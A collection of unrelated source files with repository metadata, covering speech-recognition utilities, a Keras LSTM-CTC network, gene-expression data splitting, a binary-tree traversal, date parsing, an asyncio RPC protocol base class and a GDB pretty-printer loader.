me@abhiagarwal.com
|
b4118ccd20e3a44af5e0864ac2e03dd8488f8d35
|
a6d62bb9f4cb00fea89ff10e27b516890dc8a49a
|
/utils/generic_utils.py
|
57536f8847a50c7ab234709d48cbf404620729cc
|
[
"MIT"
] |
permissive
|
WeberJulian/Wav2Vec-Wrapper
|
dca6be0edd25f67b9a3e2719dc5bee8b0bbdfb4f
|
84519cd51a4f3d9cb61de99c5712640f3cf5213d
|
refs/heads/main
| 2023-06-11T15:26:53.754106
| 2021-07-06T17:13:38
| 2021-07-06T17:13:38
| 383,545,362
| 0
| 0
|
MIT
| 2021-07-06T17:14:03
| 2021-07-06T17:14:03
| null |
UTF-8
|
Python
| false
| false
| 2,816
|
py
|
import os
import re
import yaml
import json
import torch
import numpy as np
from datasets import load_metric
wer_metric = load_metric("wer")
def calculate_wer(pred_ids, labels, processor, debug=False):
    # Replace the -100 loss-masking sentinel with the pad token id before decoding.
    labels[labels == -100] = processor.tokenizer.pad_token_id
pred_string = processor.batch_decode(pred_ids)
label_string = processor.batch_decode(labels, group_tokens=False)
wer = wer_metric.compute(predictions=pred_string, references=label_string)
if debug:
print(" > DEBUG: \n\n PRED:", pred_string, "\n Label:", label_string)
return wer
class AttrDict(dict):
"""A custom dict which converts dict keys
to class attributes"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__dict__ = self
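# Usage sketch (illustrative): d = AttrDict(lr=1e-3); d.lr and d['lr'] both
# return 1e-3, because __dict__ is aliased to the dict itself.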
def read_json_with_comments(json_path):
# fallback to json
with open(json_path, "r", encoding="utf-8") as f:
input_str = f.read()
# handle comments
input_str = re.sub(r"\\\n", "", input_str)
input_str = re.sub(r"//.*\n", "\n", input_str)
data = json.loads(input_str)
return data
def load_config(config_path: str) -> AttrDict:
"""Load config files and discard comments
Args:
config_path (str): path to config file.
"""
config = AttrDict()
ext = os.path.splitext(config_path)[1]
if ext in (".yml", ".yaml"):
with open(config_path, "r", encoding="utf-8") as f:
data = yaml.safe_load(f)
else:
data = read_json_with_comments(config_path)
config.update(data)
return config
def load_vocab(vocab_path):
    config = AttrDict()
    config.update(read_json_with_comments(vocab_path))
    return config
def save_best_checkpoint(log_dir, model, optimizer, lr_scheduler, scaler, step, epoch, val_loss, best_loss, early_epochs=None):
if val_loss < best_loss:
best_loss = val_loss
if early_epochs is not None:
early_epochs = 0
model_save_path = os.path.join(log_dir, 'pytorch_model.bin')
# model.save_pretrained(log_dir) # export model with transformers for save the config too
torch.save(model.state_dict(), model_save_path)
optimizer_save_path = os.path.join(log_dir, 'optimizer.pt')
checkpoint_dict = {
'optimizer': optimizer.state_dict(),
'scheduler': lr_scheduler.state_dict(),
'step': step,
'epoch': epoch
}
if scaler is not None:
checkpoint_dict['scaler'] = scaler.state_dict()
torch.save(checkpoint_dict, optimizer_save_path)
print("\n > BEST MODEL ({0:.5f}) saved at {1:}".format(
val_loss, model_save_path))
else:
if early_epochs is not None:
early_epochs += 1
return best_loss, early_epochs
|
[
"edresson1@gmail.com"
] |
edresson1@gmail.com
|
47e279735f840d1e03f6ec23975d5337aa5da6bc
|
376e4114a1ef612ae5d0d2a53a74076870562067
|
/2017/R1CA/Pancake.py
|
91a0621901dc3c2ad74766f7eec04f93645d6b25
|
[] |
no_license
|
jacegem/google-codejam-py
|
1890e895c56ceb6c4cbcaa4c5cae213f1cb2dd6a
|
4e3300021c7f54c339da92afc0974d5076d60499
|
refs/heads/master
| 2021-06-06T07:45:53.946239
| 2021-04-10T03:30:49
| 2021-04-10T03:30:49
| 89,255,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 445
|
py
|
class Pancake:
def __init__(self, r, h, top, surface):
self.r = r
self.h = h
self.top = top
self.surface = surface
self.used = False
self.top_surface = top + surface
def set_used(self, used):
self.used = used
def is_used(self):
return self.used
    def get_top_surface(self):
        return self.top_surface
def sort_surface(self):
return self.surface
|
[
"jacegem@gmail.com"
] |
jacegem@gmail.com
|
0c951d03079b7356ec0f67cbf8d87e34b58a4537
|
1edf4c50123a6001b30cff3ad098d566f058ed8f
|
/utility/dataSplit.py
|
d7b3bfe61f47b3d43122e90d8c00effdac2fb8d1
|
[] |
no_license
|
HaohanWang/geneExpressionRepresentation
|
be19fa9c89b55063f22614bf6938249275264369
|
5e6881f7e5f3c3a04325437a4894387219e852b8
|
refs/heads/master
| 2021-01-10T17:44:36.209021
| 2016-05-03T05:44:19
| 2016-05-03T05:44:19
| 50,133,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,246
|
py
|
import numpy as np
# ids = [line.strip() for line in open('../data/ids.txt')]
#
# text = [line.strip() for line in open('../data/ppi_ids.txt')]
#
# ppi = {}
#
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# ppi[(id1, id2)] = 0
#
# count = 0
#
# p = []
# n = []
# np.random.seed(1)
#
# for id1 in ids:
# count += 1
# if count %100==0:
# print id1
# for id2 in ids:
# if (id1, id2) in ppi:
# p.append((id1, id2))
# else:
# if np.random.random() < 0.00017:
# n.append((id1, id2))
#
# print len(n)
# p = p[:12500]
# n = n[:12500]
#
# for i in range(5):
# f1 = open('../data/split/ids_train_'+str(i+1)+'.txt', 'w')
# f2 = open('../data/split/ids_test_'+str(i+1)+'.txt', 'w')
# f1_ = open('../data/split/labels_train_'+str(i+1)+'.txt', 'w')
# f2_ = open('../data/split/labels_test_'+str(i+1)+'.txt', 'w')
#
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f2_.writelines('1\n')
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f2_.writelines('0\n')
#
# for k in range(0, i*2500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
#
# for k in range(0, i*2500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
#
# f1.close()
# f2.close()
# f1_.close()
# f2_.close()
ids = [line.strip() for line in open('../data/ids.txt')]
print len(ids)
data = np.loadtxt('../data/ge.csv', delimiter=',')
print data.shape
ge = {}
for i in range(len(ids)):
ge[ids[i]] = data[i,:]
#
# for i in range(5):
# t1l = []
# t1r = []
# t2l = []
# t2r = []
#
# #train
# text = [line.strip() for line in open('../data/split/ids_train_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t1l.append(ge[id1])
# t1r.append(ge[id2])
# np.savetxt('../data/split/data_train_'+str(i+1)+'_a.txt', t1l, delimiter=',')
# np.savetxt('../data/split/data_train_'+str(i+1)+'_b.txt', t1r, delimiter=',')
#
# #test
# text = [line.strip() for line in open('../data/split/ids_test_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t2l.append(ge[id1])
# t2r.append(ge[id2])
# np.savetxt('../data/split/data_test_'+str(i+1)+'_a.txt', t2l, delimiter=',')
# np.savetxt('../data/split/data_test_'+str(i+1)+'_b.txt', t2r, delimiter=',')
text = [line.strip() for line in open('../data/ids_final.txt')]
t1l = []
t1r = []
for line in text:
items = line.split()
id1 = items[0]
id2 = items[1]
t1l.append(ge[id1])
t1r.append(ge[id2])
np.savetxt('../data/split/data_final_a.txt', t1l, delimiter=',')
np.savetxt('../data/split/data_final_b.txt', t1r, delimiter=',')
|
[
"haohanw@andrew.cmu.edu"
] |
haohanw@andrew.cmu.edu
|
30665cc9a04c96f8151128447b3694303cff9e74
|
293b7305b86628aa92e23ea10f799b4848661aa5
|
/implugin/flashmsg/tests/test_models.py
|
6cc1793d411b7303753914717ef8ebcdde503af4
|
[] |
no_license
|
socek/impaf-flashmsg
|
2ce751c54ff8d9e95f38a691b3579320e3ace546
|
4af4355934f6edf512893f7e9dacfe188179ea62
|
refs/heads/master
| 2020-04-08T20:58:21.124723
| 2015-08-14T18:05:55
| 2015-08-14T18:05:55
| 38,713,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 655
|
py
|
from mock import sentinel
from impaf.testing import PyTestCase
from ..models import FlashMessage
class TestFlasMessage(PyTestCase):
_object_cls = FlashMessage
def test_to_dict(self):
obj = self.object(sentinel.message, sentinel.msgtype)
assert obj.to_dict() == {
'message': sentinel.message,
'msgtype': sentinel.msgtype,
}
def test_from_dict(self):
obj = self.object()
obj.from_dict({
'message': sentinel.message,
'msgtype': sentinel.msgtype,
})
assert obj.message == sentinel.message
assert obj.msgtype == sentinel.msgtype
|
[
"msocek@gmail.com"
] |
msocek@gmail.com
|
1ce69a1233f5a517348185955b4ec1e46eafffd4
|
c7aea375046d194a5bd3c9fda615519f4374b790
|
/lab3/text_recognizer/networks/line_lstm_ctc.py
|
35205b418d4502e5425aa5d9522fd2821741b094
|
[] |
no_license
|
venuraja79/fsdl-text-recognizer-project
|
195b16bff453df5acda65181e96f65cb98172b54
|
1b9d20f0de2dd5aa59af490b086f985411c60e20
|
refs/heads/master
| 2020-06-30T22:09:45.433461
| 2019-08-07T08:53:05
| 2019-08-07T08:53:05
| 200,964,049
| 0
| 1
| null | 2019-08-07T03:20:26
| 2019-08-07T03:20:24
| null |
UTF-8
|
Python
| false
| false
| 2,406
|
py
|
"""LSTM with CTC for handwritten text recognition within a line."""
import tensorflow.keras.backend as K
from tensorflow.python.client import device_lib # pylint: disable=no-name-in-module
from tensorflow.keras.layers import Dense, Input, Reshape, TimeDistributed, Lambda, LSTM, CuDNNLSTM
from tensorflow.keras.models import Model as KerasModel
from text_recognizer.networks.lenet import lenet
from text_recognizer.networks.misc import slide_window
from text_recognizer.networks.ctc import ctc_decode
def line_lstm_ctc(input_shape, output_shape, window_width=28, window_stride=14): # pylint: disable=too-many-locals
image_height, image_width = input_shape
output_length, num_classes = output_shape
num_windows = int((image_width - window_width) / window_stride) + 1
if num_windows < output_length:
raise ValueError(f'Window width/stride need to generate >= {output_length} windows (currently {num_windows})')
image_input = Input(shape=input_shape, name='image')
y_true = Input(shape=(output_length,), name='y_true')
input_length = Input(shape=(1,), name='input_length')
label_length = Input(shape=(1,), name='label_length')
gpu_present = len(device_lib.list_local_devices()) > 2
lstm_fn = CuDNNLSTM if gpu_present else LSTM
# Your code should use slide_window and extract image patches from image_input.
# Pass a convolutional model over each image patch to generate a feature vector per window.
# Pass these features through one or more LSTM layers.
# Convert the lstm outputs to softmax outputs.
# Note that lstms expect a input of shape (num_batch_size, num_timesteps, feature_length).
# Your code below (Lab 3)
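    # A minimal sketch of the missing block (not the official lab solution;
    # it assumes lenet() returns a Keras model whose penultimate layer emits
    # a per-window feature vector, as in the earlier labs):
    image_reshaped = Reshape((image_height, image_width, 1))(image_input)
    image_patches = Lambda(
        slide_window,
        arguments={'window_width': window_width, 'window_stride': window_stride}
    )(image_reshaped)
    convnet = lenet((image_height, window_width, 1), (num_classes,))
    convnet = KerasModel(inputs=convnet.inputs, outputs=convnet.layers[-2].output)
    convnet_outputs = TimeDistributed(convnet)(image_patches)
    lstm_output = lstm_fn(128, return_sequences=True)(convnet_outputs)
    softmax_output = Dense(num_classes, activation='softmax', name='softmax_output')(lstm_output)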
# Your code above (Lab 3)
input_length_processed = Lambda(
lambda x, num_windows=None: x * num_windows,
arguments={'num_windows': num_windows}
)(input_length)
ctc_loss_output = Lambda(
lambda x: K.ctc_batch_cost(x[0], x[1], x[2], x[3]),
name='ctc_loss'
)([y_true, softmax_output, input_length_processed, label_length])
ctc_decoded_output = Lambda(
lambda x: ctc_decode(x[0], x[1], output_length),
name='ctc_decoded'
)([softmax_output, input_length_processed])
model = KerasModel(
inputs=[image_input, y_true, input_length, label_length],
outputs=[ctc_loss_output, ctc_decoded_output]
)
return model
|
[
"sergeykarayev@gmail.com"
] |
sergeykarayev@gmail.com
|
f49719da2036ba7ff1dc02db5fb0434c2acd830a
|
f23a0561ed2e1f5192a2933ba3205bbc84e0172c
|
/ruidun_system/internet_operate/viewsets/get_monitoring_viewset.py
|
f7d1a4efbee6c85c9b9e2e159797e78386e57bc5
|
[] |
no_license
|
TingxieLi/django-restframework
|
a179a794760830cedcf60c0069cb7c8d4c7127cd
|
3645bc3a396727af208db924c6fdee38abc0f894
|
refs/heads/master
| 2020-12-05T13:13:29.937243
| 2019-07-18T03:33:23
| 2019-07-18T03:33:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
py
|
from rest_framework import viewsets
class GetMonitoringViewSet(viewsets.ReadOnlyModelViewSet):
def retrieve(self, request, *args, **kwargs):
        # Fetch the video content. The video is supposed to be streamed in
        # real time; how should the data be returned here?
pass
|
[
"851864721@qq.com"
] |
851864721@qq.com
|
08f94cf25a949eefbaca4cf0a9b2fc8d254be62e
|
f295b56e9af284092233a724af041a91b35a9f6a
|
/binary-tree-level-order-traversal/binary-tree-level-order-traversal.py
|
eb00973a0045f605df9fbf717059748d2f4e83a2
|
[] |
no_license
|
saviaga/Coding_E
|
7ebdf03b5eca775903ee4b863b56e26190b40029
|
dd21bb3b9d8905263416b206877f1a3d9416ee3f
|
refs/heads/main
| 2023-05-02T19:42:07.267054
| 2021-05-21T17:41:52
| 2021-05-21T17:41:52
| 334,220,320
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
import collections
from typing import List


# Definition for a binary tree node.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


class Solution:
    def levelOrder(self, root: TreeNode) -> List[List[int]]:
        if root is None:
            return []
        queue = collections.deque([root])
ans = []
while queue:
level = []
for _ in range(len(queue)):
current = queue.popleft()
level.append(current.val)
if current.left:
queue.append(current.left)
if current.right:
queue.append(current.right)
ans.append(level)
return ans
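# Worked example (illustrative): the tree [3,9,20,null,null,15,7] produces
# [[3], [9, 20], [15, 7]] - one sub-list per depth, left to right.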
|
[
"saviaga@gmail.com"
] |
saviaga@gmail.com
|
4ce02e446ce4895df060625959a73f6d4a1e7ff2
|
1deda52f84b25e52a70dd26afa31c1e40a8391ac
|
/tools/improved-bertscore-for-image-captioning-evaluation/match_cand_refs.py
|
e691f1f139291d3f3ce03d32227a38703e6144ae
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jlcsilva/syncap
|
7ae7b7974b1c3eeb6507006a325725a67c765c7b
|
c8191de4e77b6ea9109f124b9f398d9f2c7d7662
|
refs/heads/master
| 2023-04-10T23:16:39.902339
| 2021-04-23T06:03:24
| 2021-04-23T06:03:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 906
|
py
|
import json
import argparse
from collections import defaultdict
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--refs_file')
parser.add_argument('--cand_file')
parser.add_argument('--output_fn')
args = parser.parse_args()
# Refs
j = json.load(open(args.refs_file))
anns = j['annotations']
image2anns = defaultdict(list)
for ann in anns:
image2anns[ann['image_id']].append(ann['caption'].strip())
# Cand
j = json.load(open(args.cand_file))
image2cand = defaultdict(list)
for ann in j:
image2cand[ann['image_id']].append(ann['caption'])
samples = {}
for ix, img in enumerate(image2cand):
d = dict()
d['refs'] = image2anns[img] #[:5]
d['cand'] = image2cand[img]
samples[str(ix)] = d
with open(args.output_fn, 'w') as f:
json.dump(samples, f)
|
[
"emanuele@di.ku.dk"
] |
emanuele@di.ku.dk
|
79d14202170a7d08135e126bbb7479e3da932f84
|
09f0505f3ac1dccaf301c1e363423f38768cc3cc
|
/r_DailyProgrammer/Easy/C266/unittests/unittest.py
|
07fde993ddb932a70f2021b847e679aadef121e2
|
[] |
no_license
|
Awesome-Austin/PythonPractice
|
02212292b92814016d062f0fec1c990ebde21fe7
|
9a717f91d41122be6393f9fcd1a648c5e62314b3
|
refs/heads/master
| 2023-06-21T11:43:59.366064
| 2021-07-29T23:33:00
| 2021-07-29T23:33:00
| 270,854,302
| 0
| 0
| null | 2020-08-11T20:47:10
| 2020-06-08T23:24:09
|
Python
|
UTF-8
|
Python
| false
| false
| 259
|
py
|
#! python3
import unittest
from r_DailyProgrammer.Easy.C266.unittests.test_values import TEST_VALUES
class MyTestCase(unittest.TestCase):
def test_something(self):
self.assertEqual(True, False)
if __name__ == '__main__':
unittest.main()
|
[
"{ID}+{username}@users.noreply.github.com"
] |
{ID}+{username}@users.noreply.github.com
|
7e177a8d82713addc215fa1037b0a74cbfaafb7d
|
b9be3d951bfab350191092540edc6e353283d621
|
/.direnv/python-3.4.3/bin/rst2xml.py
|
94a9206c1126cc30a738a855d3950f2aca899539
|
[] |
no_license
|
bekkblando/django-social
|
7ebd82f66c82ffa6918621e5ee7142bfa5f712d8
|
fe47d1babb94170e5403af9ce0f3c672c3045a0d
|
refs/heads/master
| 2020-12-11T01:40:01.429628
| 2015-08-18T14:24:33
| 2015-08-18T14:24:33
| 38,706,690
| 0
| 0
| null | 2015-07-07T18:25:26
| 2015-07-07T18:25:25
| null |
UTF-8
|
Python
| false
| false
| 668
|
py
|
#!/Users/BekkBlando/Documents/github/djangosocial/.direnv/python-3.4.3/bin/python3.4
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
|
[
"bekkblando@gmail.com"
] |
bekkblando@gmail.com
|
52aee0fd09b24edae3d34ee70ae4d681a2aa67da
|
3291359d8867e7b5ca9e8befb83629810938f903
|
/timetable_v3/timetable_v3/urls.py
|
eb0c1bca0f82d83d2d60c6e88d1f7d126e417997
|
[] |
no_license
|
A-miin/timetable_v3
|
f9e4610800acb83f3477dcffd2b0ce1c75d2c1d0
|
1de0885f04beec83657672275deff22b71af2de3
|
refs/heads/master
| 2023-06-09T18:51:44.298534
| 2021-07-02T15:01:54
| 2021-07-02T15:01:54
| 341,462,656
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,035
|
py
|
"""timetable_v3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
import debug_toolbar
from webapp import urls
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('webapp.urls')),
path('secretariat/', include('secretariat.urls', namespace='secretariat')),
path('api/', include('api.urls', namespace='api')),
path('__debug__/', include(debug_toolbar.urls)),
]
|
[
"zulaykaisaeva@gmail.com"
] |
zulaykaisaeva@gmail.com
|
2ad7d7451c252323a7b922b7ce42a3e1f7a03c10
|
1ec29bec73904435980eedc26b3f1e07fafb8784
|
/shmakovpn/tests/add_method_to_class/test_add_method_to_class.py
|
cbf04d3fd1befc3caed91a88242ef0ba4f9491ed
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
shmakovpn/shmakovpn_tools
|
4f799c803f4ebdff0e82253ec161d5977e6036cb
|
85090c9489b0b9fa13b6c42c91459efe9b966a3b
|
refs/heads/master
| 2023-06-08T17:32:34.591391
| 2021-06-17T05:22:38
| 2021-06-17T05:22:38
| 284,875,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,118
|
py
|
"""
The simple example that explains the impossibility of adding a method to builtin type.
Author: shmakovpn <shmakovpn@yandex.ru>
Date: 2020-10-01
"""
import unittest
class TestAddMethodToClass(unittest.TestCase):
"""
It is possible to add a method to a class outside of the class
"""
def test_add_method_to_class(self):
class A:
x = 'hello'
a = A()
A.get_x = lambda self: self.x
self.assertEqual(a.get_x(), 'hello')
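        # For contrast (illustrative): the same assignment on a built-in type,
        # e.g. `int.get_x = lambda self: self`, raises TypeError because
        # built-in/extension types do not allow attribute assignment.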
def test_add_method_to_list(self):
"""
It is impossible to add a method to a built-in type
:return:
"""
try:
list.hello = lambda self: f'hello from list'
some_list = []
self.assertEqual(some_list.hello(), 'hello from list')
except TypeError as e:
pass
except Exception as e:
self.assertTrue(False, msg='An unknown exception was raised instead of the expected TypeError')
else:
self.assertTrue(False, msg='The expected TypeError exception was not raised')
|
[
"shmakovpn@yandex.ru"
] |
shmakovpn@yandex.ru
|
66d3b0de7469b1683d10d96d96d69ab4acea07d3
|
56b36ddf920b5f43e922cb84e8f420f1ad91a889
|
/Hackerrank/Hackkerrank-Designer PDF Viewer.py
|
1c85d2e8aa255eccd12daed1cbc4d104ce1bd3ca
|
[] |
no_license
|
chithien0909/Competitive-Programming
|
9ede2072e85d696ccf143118b17638bef9fdc07c
|
1262024a99b34547a3556c54427b86b243594e3c
|
refs/heads/master
| 2022-07-23T16:47:16.566430
| 2020-05-12T08:44:30
| 2020-05-12T08:44:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the designerPdfViewer function below.
def designerPdfViewer(h, word):
# word = nhan
# arr = [1,3,2,1]
arr=[]
for letter in word:
index = ord(letter) - 97
arr.append(h[index])
return max(arr) * len(arr)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
h = list(map(int, input().rstrip().split()))
word = input()
result = designerPdfViewer(h, word)
fptr.write(str(result) + '\n')
fptr.close()
|
[
"ntle1@pipeline.sbcc.edu"
] |
ntle1@pipeline.sbcc.edu
|
07c43020b2c4de524585a2995ba0ad589f42ef70
|
8fd92c0a65c9b3e3912b6e8ef043656ee225880a
|
/datetime_examples.py
|
e6023b44234c3f6cfb1b822db2448812f1685d86
|
[] |
no_license
|
waiteb15/py3forsci3day
|
9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4
|
fc664042618f0910d40e85677a2438eef5cce2b7
|
refs/heads/master
| 2020-04-25T11:24:18.697218
| 2019-02-28T23:40:52
| 2019-02-28T23:40:52
| 172,743,315
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 988
|
py
|
#!/usr/bin/env python
from datetime import date, datetime, timedelta, time
today = date.today()
print(today, today.year)
james_bd = date(2014, 8, 1)
print(james_bd)
delta = today - james_bd
print(delta)
years = int(delta.days // 365.25)
print(f"James is {years} years old")
event = datetime(2019, 5, 11, 13, 22, 47)
print(event)
ten_years = timedelta(10 * 365.25)
print(james_bd + ten_years)
import time  # note: this rebinds the name `time` imported from datetime above
start = time.time()
# do something
end = time.time()
seconds = end - start
print("Wait for it....", end="", flush=True)
time.sleep(0)
print("done")
from dateutil.parser import parse
import dateutil.utils
my_dates = [
"Apr 1, 2019",
"2019-04-01",
"4/1/19",
"4-1-2019",
"April 1 2019",
"Feb 31, 2032",
]
for d in my_dates:
try:
print(parse(d))
except Exception as err:
print(err)
d = dateutil.utils.datetime(2019, 4, 1, 11, 11, 11, 0)
print(d, type(d))
|
[
"waiteb15@gmail.com"
] |
waiteb15@gmail.com
|
10ebe15e221446bab08a4d897fc101f9d8a8b95f
|
a5aabe2e4057d78e687a57a6b560516a7cdb5836
|
/unsserv/common/rpc/protocol.py
|
688b39a308b01db7dacf58311fc8aea432c875c7
|
[
"MIT"
] |
permissive
|
aratz-lasa/py-unsserv
|
0ffc09ddab65a11ce917d0faa8b1b5dff091e563
|
6f332385e55d05953186b9a8b7848bca4b878e18
|
refs/heads/master
| 2022-12-14T21:10:12.397834
| 2020-05-03T11:29:49
| 2020-05-03T11:29:49
| 228,329,158
| 5
| 0
|
MIT
| 2022-12-08T07:00:55
| 2019-12-16T07:35:20
|
Python
|
UTF-8
|
Python
| false
| false
| 2,808
|
py
|
import asyncio
from abc import ABC, abstractmethod
from dataclasses import is_dataclass, asdict
from enum import IntEnum
from typing import Any, Tuple, Sequence, Dict, Callable
from unsserv.common.rpc.rpc import RPCRegister, RPC
from unsserv.common.rpc.structs import Message
from unsserv.common.structs import Node
Command = IntEnum
Data = Any
Handler = Callable[..., Any]
class ITranscoder(ABC):
my_node: Node
service_id: str
def __init__(self, my_node: Node, service_id: str):
self.my_node = my_node
self.service_id = service_id
@abstractmethod
def encode(self, command: Command, *data: Data) -> Message:
pass
@abstractmethod
def decode(self, message: Message) -> Tuple[Command, Sequence[Data]]:
pass
class AProtocol:
my_node: Node
service_id: str
_rpc: RPC
_transcoder: ITranscoder
_handlers: Dict[Command, Handler]
_running: bool
def __init__(self, my_node: Node):
self.my_node = my_node
self._rpc = RPCRegister.get_rpc(my_node)
self._handlers = {}
self._running = False
async def start(self, service_id: str):
if self._running:
raise RuntimeError("Protocol already running")
self.service_id = service_id
self._transcoder = self._get_new_transcoder()
await self._rpc.register_service(service_id, self.handle_rpc)
self._running = True
async def stop(self):
if self._running:
await self._rpc.unregister_service(self.service_id)
self._running = False
async def handle_rpc(self, message: Message):
command, data = self._transcoder.decode(message)
handler = self._handlers[command]
if asyncio.iscoroutinefunction(handler):
response = await handler(message.node, *data)
return self._encode_response(response)
else:
response = handler(message.node, *data)
return self._encode_response(response)
def _encode_response(self, response: Any) -> Any:
if isinstance(response, list):
return [self._encode_response(response_item) for response_item in response]
elif isinstance(response, tuple):
return tuple(
self._encode_response(response_item) for response_item in response
)
elif hasattr(response, "encode"):
return response.encode()
elif is_dataclass(response):
return asdict(response)
elif isinstance(response, set):
return list(response)
return response
@abstractmethod
def _get_new_transcoder(self):
"""
Method for initializing ITranscoder, because every Protocol implements
its own.
:return:
"""
pass
|
[
"aratzml@opendeusto.es"
] |
aratzml@opendeusto.es
|
17ae1f4270a5e2ebf48e65265aafc3399ecba836
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/E9FwvGyad5CDbiH4C_14.py
|
47f2553b08320fb3dbcb4e7c16ad17e66bc52e21
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
def block(lst):
    # Transpose the grid, keeping only the columns that contain a 2.
    lista = [list(i) for i in list(zip(*lst)) if 2 in i]
    q = 0
    for i in lista:
        # Count the cells below the first 2 in each such column.
        q += len(i) - (i.index(2) + 1)
    return q
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f4823491f0f44b3d340a720dbc47cf29a5a8e325
|
55540f3e86f1d5d86ef6b5d295a63518e274efe3
|
/toolchain/riscv/MSYS/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d/libstdc++.a-gdb.py
|
8e9d75e886ed14abcb55b187bbbe376b0ca67b81
|
[
"Apache-2.0"
] |
permissive
|
bouffalolab/bl_iot_sdk
|
bc5eaf036b70f8c65dd389439062b169f8d09daa
|
b90664de0bd4c1897a9f1f5d9e360a9631d38b34
|
refs/heads/master
| 2023-08-31T03:38:03.369853
| 2023-08-16T08:50:33
| 2023-08-18T09:13:27
| 307,347,250
| 244
| 101
|
Apache-2.0
| 2023-08-28T06:29:02
| 2020-10-26T11:16:30
|
C
|
UTF-8
|
Python
| false
| false
| 2,772
|
py
|
# -*- python -*-
# Copyright (C) 2009-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/share/gcc-10.2.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
